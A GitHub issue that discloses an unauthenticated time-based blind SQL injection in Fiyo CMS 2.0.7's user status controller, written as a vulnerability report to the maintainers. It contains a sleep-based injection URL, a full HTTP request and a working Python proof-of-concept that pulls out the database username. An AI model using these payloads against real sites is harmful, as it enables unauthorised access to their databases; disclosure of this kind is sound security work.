Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

dapur\apps\app_user\Status.php $ _GET['stat'] $ _GET['id'] variable exists SQL injection vulnerability #7

Open
Rai4over opened this issue Jul 21, 2017 · 2 comments

Comments

@Rai4over
Copy link

Rai4over commented Jul 21, 2017

Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work

Fiyo CMS version 2.0.7 There is a SQL injection vulnerability
There is no need to login in when exploiting this vulnerability

Code does not validate and validate $_GET ['stat'] $_GET ['id'] variables
These two variables can be controlled by malicious attackers,
control the program execution process and the malicious string into the database caused by SQL injection

File location: dapur/app/app_user/controller/status.php
(Https://github.com/FiyoCMS/FiyoCMS/blob/master/dapur/apps/app_user/controller/status.php)

image


http:// 127.0.0.1/FiyoCMS/ is the installation path of the site program

Vulnerability Verification① (Send a SQL injection attack packet that causes a response delay)

Get_Url: http://127.0.0.1/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
Referrer: http://127.0.0.1


Detailed http request packet

GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/FiyoCMS/
Cookie: Hm_lvt_2f11040b51649a178c3fc835fd60c6f1=1499412807,1499422916,1499519057,1499663544; PHPSESSID=l25a9dch25s6uhmpara5klmoo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

The response was delayed by 5 seconds

image




Vulnerability Verification② (Use the python script for SQL injection attacks and get the current database user name)

Python poc code

import requests
import time

if __name__ == '__main__':
    Target_url = 'http://127.0.0.1/FiyoCMS/'

    print 'Began to guess the length of the database user name !!'
    for x in range(50):
        start_time = time.time()
        payload = '''8899 or if(length(user())={x},sleep(2),0)'''.format(x=x)
        headers = {'Referer': Target_url}
        response = requests.get(
            Target_url + '/dapur/apps/app_user/controller/status.php?stat=1&id=' + payload,
            headers=headers)
        end_time = time.time()
        if (end_time - start_time) > 1:
            length = x
            break

    print 'The database user name length is {length} !!'.format(length=length)

    print 'Start guessing the database username !!'
    username = ''
    for x in range(length + 1):
        pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
        for p in pay_str:
            start_time = time.time()
            headers = {'Referer': Target_url}
            payload = '''8899 or if(substr(user(),{q},1)='{w}',sleep(2),0) '''.format(q=x, w=p)
            response = requests.get(
                Target_url + '/dapur/apps/app_user/controller/status.php?stat=1&id=' + payload,
                headers=headers)
            end_time = time.time()
            if (end_time - start_time) > 1:
                username = username + p
                print username
                break
    print 'The database user name is {username}'.format(username=username)

image

Discoverer: Rai4over of Neusoft

@firstryan
Copy link
Contributor

firstryan commented Jul 21, 2017 via email

@Rai4over
Copy link
Author

@firstryan If it is convenient, please confirm another file to delete the problem, please help me apply cve-id, thank you very much

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants